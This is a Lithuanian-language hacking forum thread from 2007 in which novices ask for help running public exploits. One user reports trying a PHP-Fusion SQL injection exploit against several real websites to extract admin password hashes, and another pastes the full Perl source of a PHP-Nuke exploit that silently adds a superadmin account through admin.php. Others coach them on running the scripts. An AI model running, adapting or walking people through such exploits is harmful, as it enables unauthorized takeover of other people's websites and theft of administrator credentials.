Exploit

Hakeriai dalinkitės patirtimi
Skelbti atsakymą
Žinutė
Autorius
DeMO
nuolatinis dalyvis
nuolatinis dalyvis
Pranešimai:34
Užsiregistravo:2007 01 09 15:13

#136 Standartinė DeMO » 2007 03 02 17:57

Sveiki visi..

Gal kas gali padėti ištaisyti klaidą šiame php exploite?
http://www.milw0rm.com/exploits/1796

Jau dvi valandas sėdžiu ieškau kas ne taip, žiūriu į kitus php sploitus, kad nelabai randu kas ne taip.. rodo
admin:
hash:
bet nerodo hash'o ir admin nick.. kas ne taip.. ? Kur ten klaida. :?

Vartotojo avataras
GODhack
profesionalas
profesionalas
Pranešimai:4469
Užsiregistravo:2005 03 18 21:13
Susisiekti:

#137 Standartinė GODhack » 2007 03 02 18:18

tikrai nera klaidos nepavyksta tau jo panaudoti tikriausiai.
Nepatikti blogiems - girtinas dalykas. SENEKA
__________________________________________
progenic.com
library.2ya.com
Paveikslėlis

DeMO
nuolatinis dalyvis
nuolatinis dalyvis
Pranešimai:34
Užsiregistravo:2007 01 09 15:13

#138 Standartinė DeMO » 2007 03 02 19:06

Na bet blin, kas čia ne taip tada.. :/
Rašau va taip:
php.exe php-fus_sql_injec.php www.saitas.lt / Vardas Slaptazodis
:?

Ir rodo, kad coocies gaunu, bet hash nerodo admino..

Vartotojo avataras
VilMixas
nuolatinis dalyvis
nuolatinis dalyvis
Pranešimai:28
Užsiregistravo:2007 02 28 23:21

Pdekit

#139 Standartinė VilMixas » 2007 03 02 20:40

Na viska perskaiciau ir bandziau paleist, bet kazka netaip padariau, nu as pasakysiu kaip dariau o jus jei galit pasakykit kas blogaj....
Susiradau exploita tada jy nusikopinau y notepad padariau .pl pletiny o tada komandu eilutej parasiau
C:\Documents and Settings\User>perl\bin\perl.exe
C:\Documents and Settings\User>exploitas.pl

Nu nelabaj zinau kas netaip ? gal ten kazka per perla reikia daryt?

DeMO
nuolatinis dalyvis
nuolatinis dalyvis
Pranešimai:34
Užsiregistravo:2007 01 09 15:13

Re: Pdekit

#140 Standartinė DeMO » 2007 03 02 20:49

VilMixas rašė:Na viska perskaiciau ir bandziau paleist, bet kazka netaip padariau, nu as pasakysiu kaip dariau o jus jei galit pasakykit kas blogaj....
Susiradau exploita tada jy nusikopinau y notepad padariau .pl pletiny o tada komandu eilutej parasiau
C:\Documents and Settings\User>perl\bin\perl.exe
C:\Documents and Settings\User>exploitas.pl

Nu nelabaj zinau kas netaip ? gal ten kazka per perla reikia daryt?
Nukopijuok čia exploitą, pažiūrėsiu.. Gal exploitas ne Perl? :roll:
A.. taigi jomajo.. neteisingai rašai.. :D

Vartotojo avataras
VilMixas
nuolatinis dalyvis
nuolatinis dalyvis
Pranešimai:28
Užsiregistravo:2007 02 28 23:21

#141 Standartinė VilMixas » 2007 03 02 20:56

#!/usr/bin/perl
use LWP::UserAgent;

print "========================================\n";
print " PHP-NUKE all versions add admin exploit\n";
print " Exploit coded by matrix_killer\n";
print " Greetz to all omega-team members\n";
print " See the sourece for more information\n";
print "========================================\n";


print "Enter host: "; #example:www.host.org

my $host=<STDIN>;

chomp ($host);

print "Enter username: "; #example:Lamer

my $user=<STDIN>;

chomp ($user);

print "Enter pass: "; #example:lamer

my $pass=<STDIN>;

chomp ($pass);

print "Enter base64 username and md5 hash: ";

my $base64=<STDIN>;

chomp ($base64);


my $ua = new LWP::UserAgent;
$ua->proxy(['http'] => 'http://192.168.166.167:6588'); #setup here the proxy and the port
#Change the base64 text to the base 64 username and password
my $xpl="http://$host/admin.php?op=AddAuthor&add_aid=$user&add_name=God&add_pwd=$pass&add_email=hacked@rooted.com&add_radminsuper=1&admin=$base64";

my $res = $ua->request(new HTTP::Request POST => $xpl);
print "DONE !!! Now go to $host/admin.php and login as $user for username and $pass for password\n";

Vartotojo avataras
VilMixas
nuolatinis dalyvis
nuolatinis dalyvis
Pranešimai:28
Užsiregistravo:2007 02 28 23:21

#142 Standartinė VilMixas » 2007 03 02 21:18

TAJ KAS NE TAIP?

DeMO
nuolatinis dalyvis
nuolatinis dalyvis
Pranešimai:34
Užsiregistravo:2007 01 09 15:13

#143 Standartinė DeMO » 2007 03 02 21:21

VilMixas rašė:TAJ KAS NE TAIP?
rašyk taip:
cd C:\perl\bin\
exploitas.pl
:P

Vartotojo avataras
VilMixas
nuolatinis dalyvis
nuolatinis dalyvis
Pranešimai:28
Užsiregistravo:2007 02 28 23:21

#144 Standartinė VilMixas » 2007 03 02 21:35

Gal skype turi?

Vartotojo avataras
k4r0l1s
jaunasis rašytojas
jaunasis rašytojas
Pranešimai:56
Užsiregistravo:2006 12 30 21:45
Miestas:Kaunas

#145 Standartinė k4r0l1s » 2007 03 02 21:36

kaip vadinasi kompiliavimo programa?
is kur atsisiut?
Paskutinį kartą redagavo k4r0l1s 2007 03 02 22:44, redaguota 1 kartą(us).

Vartotojo avataras
VilMixas
nuolatinis dalyvis
nuolatinis dalyvis
Pranešimai:28
Užsiregistravo:2007 02 28 23:21

#146 Standartinė VilMixas » 2007 03 02 21:45

Nu padariau taip kaip sakei ir man parase "Can.t open perl script "C:\exploitas.pl": No such file or directory"
Kaip cia suprast? Tipo netox failas ar direktorija...?

Vartotojo avataras
k4r0l1s
jaunasis rašytojas
jaunasis rašytojas
Pranešimai:56
Užsiregistravo:2006 12 30 21:45
Miestas:Kaunas

#147 Standartinė k4r0l1s » 2007 03 02 21:50

jo paziurek ar tikrai ten yra tas exploidas :)

Vartotojo avataras
VilMixas
nuolatinis dalyvis
nuolatinis dalyvis
Pranešimai:28
Užsiregistravo:2007 02 28 23:21

#148 Standartinė VilMixas » 2007 03 02 22:07

jau paleidau, tik db kita problema ten praso hosto username password....
o is kur as galiu zinot?Tas exploitas php fusion lauzt ane?
paskaiciau ir supratau kad ne tokio man exploit reikia...

DeMO
nuolatinis dalyvis
nuolatinis dalyvis
Pranešimai:34
Užsiregistravo:2007 01 09 15:13

#149 Standartinė DeMO » 2007 03 02 23:39

GODhack rašė:tikrai nera klaidos nepavyksta tau jo panaudoti tikriausiai.
God, išbandžiau ant keturių php-fusion saitų. Nothing.. Nerodo.. bet lyg ir viską teisingai surašau.. (prieš tai rašiau pavyzdį).
:roll: Kaip man su tais exploitais nesiseka..

Vartotojo avataras
VilMixas
nuolatinis dalyvis
nuolatinis dalyvis
Pranešimai:28
Užsiregistravo:2007 02 28 23:21

#150 Standartinė VilMixas » 2007 03 03 10:47

Gal galit pasakyt ka reik west pabrauktose wietose?
Paveikslėlis

Skelbti atsakymą

Grįžti į

Dabar prisijungę

Vartotojai naršantys šį forumą: 6 ir 0 svečių